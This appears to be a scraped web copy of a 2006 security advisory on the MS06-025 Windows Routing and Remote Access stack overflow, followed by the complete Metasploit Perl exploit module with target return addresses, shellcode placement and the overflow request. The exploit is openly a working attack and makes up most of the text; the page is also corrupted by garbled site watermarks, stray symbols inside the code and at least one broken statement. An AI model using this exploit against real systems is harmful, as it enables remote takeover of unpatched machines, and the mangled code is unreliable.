Windows RRAS Stack Overflow

Summary
There is a remote code execution vulnerability in the Routing and Remote Access Service that could allow an attacker who successfully exploited this vulnerability to take complete control of the affected system. There is a remote code execution vulnerability in the Routing and Remote Access Service that could allow an attacker who successfully exploited this vulnerability to take complete control of the affected system.

A vulnerability in Routing and Remote Access could allow remote code execution.
 
Credit:
The information has been provided by H D Moore.
The original article can be found at: http://metasploit.com/projects/Framework/modules/exploits/rras_ms06_025.pm
The original advisory can be found at: http://www.securiteam.com/windowsntfocus/5VP0J15IUO.html£ 
 
 Details
Vulnerable Systems:
 * Microsoft Windows 2000 Service Pack 4
 * Microsoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2
 * Microsoft Windows XP Professional x64 Edition Íø¹ÜÍøwww.bitscn.com
 * Microsoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1
 * Microsoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with SP1 for Itanium-based Systems
 * Microsoft Windows Server 2003 x64 Edition

Exploit:
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::rras_ms06_025;
use base "Msf::Exploit";
use strict;

use Pex::DCERPC;
use Pex::NDR;

my $advanced = {
 'FragSize' => [ 256, 'The DCERPC fragment size' ],
 'BindEvasion' => [ 0, 'IDS Evasion of the Bind request' ],
 'DirectSMB' => [ 0, 'Use direct SMB (445/tcp)' ], Íø¹ÜÏÂÔØdl.bitscn.com
  };

my $info = {
 'Name' => 'Microsoft RRAS MSO6-025 Stack Overflow',
 'Version' => '$Revision: 1.1 $',
 'Authors' =>
 [
  'Nicolas Pouvesle <nicolas.pouvesle [at] gmail.com>',
  'H D Moore <hdm [at] metasploit.com>'
 ],

 'Arch' => ['x86'],
 'OS' => [ 'win32', 'win2000', 'winxp' ],
 'Priv' => 1,

 'AutoOpts' => { 'EXITFUNC' => 'thread' },
 'UserOpts' => {
  'RHOST' => [ 1, 'ADDR', 'The target address' ],

  # SMB connection options
  'SMBUSER' => [ 0, 'DATA', 'The SMB username to connect with', '' ],
  'SMBPASS' => [ 0, 'DATA', 'The password for specified SMB username',''],
  'SMBDOM' => [ 0, 'DATA', 'The domain for specified SMB username', '' ],
  'SMBPIPE' => [ 1, 'DATA', 'The pipe name to use (2000=ROUTER, XP=SRVSVC)', 'ROUTER' ],
 £ },

 'Payload' => { Íø¹ÜÍøwww_bitscn_com
  'Space' => 1104,
  'BadChars' => "\x00",
  'Keys' => ['+ws2ord'],

  # sub esp, 4097 + inc esp makes stack happy
  'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
 £ },

 'Description' => Pex::Text::Freeform(
  qq{
 £ £ £  This module exploits a stack overflow in the Windows Routing and Remote
  Access Service. Since the service is hosted inside svchost.exe, a failed
  exploit attempt can cause other system services to fail as well. A valid
  username and password is required to exploit this flaw on Windows 2000.
  When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.
}
 £ ),

 'Refs' =>
 £ [
  [ 'BID', '18325' ],
  [ 'CVE', '2006-2370' ],
  [ 'OSVDB', '26437' ],
  [ 'MSB', 'MS06-025' ]
 £ ],

 'DefaultTarget' => 0,
 'Targets' =>
 £ [
  [ 'Automatic' ],
  [ 'Windows 2000', 0x7571c1e4 ], # pop/pop/ret
  [ 'Windows XP SP1', 0x7248d4cc ], # pop/pop/ret
 £ ],

 'Keys' => ['rras'],

 'DisclosureDate' => 'Jun 13 2006',
  };

sub new {
 my ($class) = @_;
 my $self = $class->SUPER::new( { 'Info' => $info, 'Advanced' => $advanced }, @_ );
 return ($self);
}

sub Exploit {
 my ($self) = @_;
 my $target_host = $self->GetVar('RHOST');
 my $target_port = $self->GetVar('RPORT');
 my $target_idx = $self->GetVar('TARGET');
 my $shellcode = $self->GetVar('EncodedPayload')->Payload;
 my $target = $self->Targets->[$target_idx];

 my $FragSize = $self->GetVar('FragSize') || 256;
 my $target = $self->Targets->[$target_idx];

 my ( $res, $rpc );

 if ( !$self->InitNops(128) ) {
  $self->PrintLine("[*] Failed to initialize the nop module."); Íø¹ÜÁªÃËbitsCN_com
  return;
 }

 my $pipe = "\\" . $self->GetVar("SMBPIPE");
 my $uuid = '20610036-fa22-11cf-9823-00a0c911e5df';
 my $version = '1.0';

 my $handle =
 £ Pex::DCERPC::build_handle( $uuid, $version, 'ncacn_np', $target_host,
  $pipe );

 my $dce = Pex::DCERPC->new(
  'handle' => $handle,
  'username' => $self->GetVar('SMBUSER'),
  'password' => $self->GetVar('SMBPASS'),
  'domain' => $self->GetVar('SMBDOM'),
  'fragsize' => $self->GetVar('FragSize'),
  'bindevasion' => $self->GetVar('BindEvasion'),
  'directsmb' => $self->GetVar('DirectSMB'),
 £ );

 if ( !$dce ) {
  $self->PrintLine("[*] Could not bind to $handle");
  return;
 }

 my $smb = $dce->;
 if ( $target->[0] =~ /Auto/ ) {
  if ( $smb->PeerNativeOS eq 'Windows 5.0' ) { Íø¹ÜÁªÃËbitsCN@com
 £ $target = $self->Targets->[1];
 £ $self->PrintLine('[*] Detected a Windows 2000 target...');
  }
  elsif ( $smb->PeerNativeOS eq 'Windows 5.1' ) {
 £ $target = $self->Targets->[2];
 £ $self->PrintLine('[*] Detected a Windows XP target...');
  }
  else {
 £ $self->PrintLine( '[*] No target available : ' . $smb->PeerNativeOS() );
 £ return;
  }
 }

 my $pattern = '';

 if ($target->[0] =~ /Windows 2000/) {

  $pattern =
 £  pack( 'V', 1 ) .
 £  pack( 'V', 0x49 ) .
 £  $shellcode .
 £  "\xeb\x06" .
 £  Pex::Text::AlphaNumText(2).
 £  pack( 'V', $target->[1] ) .
 £  "\xe9\xb7\xfb\xff\xff" ;

 } elsif( $target->[0] =~ /Windows XP/) {

  $pattern =
 £  pack( 'V', 1 ) .
 £  pack( 'V', 0x49 ) .
 £  Pex::Text::AlphaNumText(0x4c).
 £  "\xeb\x06" .
 £  Pex::Text::AlphaNumText(2).
 £  pack( 'V', $target->[1] ) .
 £  $shellcode;

 } else {
  self->PrintLine( '[*] No target available...');
  return;
 }

 # need to produce an exception
 my $request = $pattern . Pex::Text::AlphaNumText(0x4000 - length($pattern));

 my $len = length ($request);

 my $stub =
 £ Pex::NDR::Long( int( 0x20000 ) )
 £ . Pex::NDR::Long( int( $len ) )
 £ . $request
 £ . Pex::NDR::Long( int( $len ) );

 $self->PrintLine("[*] Sending request...");
 my @response = $dce->request( $handle, 0x0C, $stub );
 if (@response) {
  $self->PrintLine('[*] RPC server responded with:');
  foreach my $line (@response) {
 £ $self->PrintLine( '[*] ' . $line );
  }
  $self->PrintLine('[*] This probably means that the system is patched');

Íø¹ÜÁªÃËbitsCN@com

 }
 return;
}

1;£